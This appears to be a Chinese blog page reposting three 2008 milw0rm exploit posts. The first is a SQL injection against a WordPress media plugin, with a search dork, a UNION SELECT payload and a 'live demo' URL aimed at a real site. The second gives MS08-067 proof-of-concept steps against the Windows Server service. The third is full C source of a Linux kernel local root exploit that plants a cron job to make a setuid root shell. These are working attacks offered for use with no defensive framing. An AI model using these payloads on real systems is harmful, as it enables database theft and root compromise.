WordPress Media Holder (id) Sql injetion vulnerability

2008年10月27日 没有评论 80 views

-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------

-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------

-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]

分类: 矩阵毒刺 标签: ,

MS Windows Server Service Code Execution PoC (MS08-067)

2008年10月24日 没有评论 59 views

In vstudio command prompt:

mk.bat

next:

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.

This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.

So play around a bit, you'll get it working reliably...

poc:
http://milw0rm.com/sploits/2008-ms08-067.zip

# milw0rm.com [2008-10-23]

分类: 矩阵毒刺 标签:

Local root Exploit For Linux Kernel 2.6.9

2008年10月22日 没有评论 144 views

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer       (main PoC code)   */
/* - RoMaNSoFt (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include 
#include 
#include 
#include 
#include
#include 
#include 
#include 

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -p");
}

分类: 矩阵毒刺 标签: